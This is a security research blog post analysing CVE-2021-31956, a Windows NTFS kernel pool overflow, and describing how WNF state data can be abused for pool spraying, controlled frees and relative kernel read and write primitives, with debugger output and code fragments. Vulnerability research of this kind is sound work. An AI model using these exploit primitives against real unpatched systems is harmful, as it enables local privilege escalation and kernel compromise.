There are new articles available, click to refresh the page.
Before yesterdayNCC Group Research

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

15 July 2021 at 12:07

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describe the vulnerability within their advisory document, which notes many versions of Windows being affected and in-the-wild exploitation of the issue being used in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing a modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Framework (WNF) used by the in-the-wild attackers to enable novel exploit primitives. This lead to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.

Putting some example numbers into this, lets assume the following: There are two extended attributes within the extended attributes for the file.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So assuming that 18 < out_buf_length - 0, data would be copied into the buffer. We will use 30 for this example.

out_buf_length = 30 - 18 + 0
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values :

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario when we have the following setup if we could have the out_buf_length of 18.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

First iteration the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.
out_buf_length = 18 - 18 + 0 
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute with the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 5 + 47 + 9
ea_block_size = 137

In the resulting check will be:

ea_block_size <= out_buf_length - padding

137 <= 0 - 2

And at this point we have underflowed the check and 137 bytes will be copied off the end of the buffer, corrupting the adjacent memory.

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers for NtfsCommonQueryEa we can see that we can see that NtQueryEaFile system call path triggers this code path to reach the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled size allocation in the kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described as above.

In order to do trigger the underflow, we need to set our output buffer size to be length of the first Ea Block.

Providing we are padding the allocation, the second Ea Block will be written out of bounds of the buffer when the second Ea Block is queried.

The interesting things from this vulnerability from an attacker perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is can this be exploited reliably in the presence of modern kernel pool mitigations and is this a “good” memory corruption:

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the space within the buffer between 0-18.

There is then the padding length of 2, with the second extended attribute starting at 20 offset.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that NextEntryOffset of the first EA block is set to the offset of the overflowing EA including the padding position (20). Then for the overflowing EA block the NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block is the size in which we want to allocate our vulnerable buffer (minus the pool header). The second extended attribute block is set to the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed in NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow copy of an attacker-controlled size.

So in summary, once the extended attributes have been written to the file using NtSetEaFile. It is then necessary to trigger the vulnerable code path to act on them by setting the outbuffer size to be exactly the same size as our first extended attribute using NtQueryEaFile.

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows, however, not very much on recent versions of Windows 10 (19H1 and up). There has been significant changes with bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this and proposing some initial techniques. Without this paper being published already, exploitation of this issue would have been significantly harder.

Firstly the important thing to understand is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We determine what heap structure in which the chunk lives on from the four “backends”:

  • Low Fragmentation Heap (LFH)
  • Variable Size Heap (VS)
  • Segment Allocation
  • Large Alloc

I started off using the NtQueryEaFile parameter Length value above of 0x12 to end up with a vulnerable chunk of sized 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is due to the size of the allocation fitting being below 0x200.

We can step through the corruption of the adjacent chunk occurring by settings a conditional breakpoint on the following location:

bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'" then breakpointing on the memcpy location.

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk initially and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true, however, demonstrates that even with more restricted attacker constraints these can often be worked around and that you should always try to understand the constraints of your bug fully before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

Followed by 0x12 bytes of the data itself.

This means that chunk size calculation will be, 0x12 + 0x10 = 0x22, with this then being rounded up to the 0x30 segment chunk size.

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facitily is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF related structures used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into non-paged pool and the session pool, however, less from a paged pool perspective. As this overflow is occurring within the paged pool, then we need to find exploit primitives allocated within this pool.

Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

Which is pointed at by the WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the argument Length is our v6 value 16 (the 0x10-byte header prepended).

Therefore, we have (0x10-bytes of _POOL_HEADER) header as follows:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function we can use:

nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with data of a controlled size and data, and we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There’s also an API call which does this called NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData in turn ends up free’ing our allocation.

Whilst researching this area, I was able to reuse the free’d chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists as in my case from empirical testing, then I did not seem to be hitting this after a large spray of Wnf chunks.

Relative Memory Read

Now we have the ability to perform both a controlled allocation and free, but what about the data, itself and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

The DataSize is to denote the size of the actual data following the structure within memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some output as an example from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that the both the NTFS vulnerable chunk and the WNF chunk can be positioned with other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.

So at this point its worth noting that the relative write has not really given us anything more than we had already with the NTFS overflow. However, as the data can be both read and written back using this technique then it opens up the ability to read data, modify certain parts of it and write it back.

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, but this wrong assumption lead to me trying to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize of a 0x30 sized chunk WNF _POOL_HEADER.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is free’d using our controlled free, we can force the chunks address to be stored within the wrong lookaside list for the size.

Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
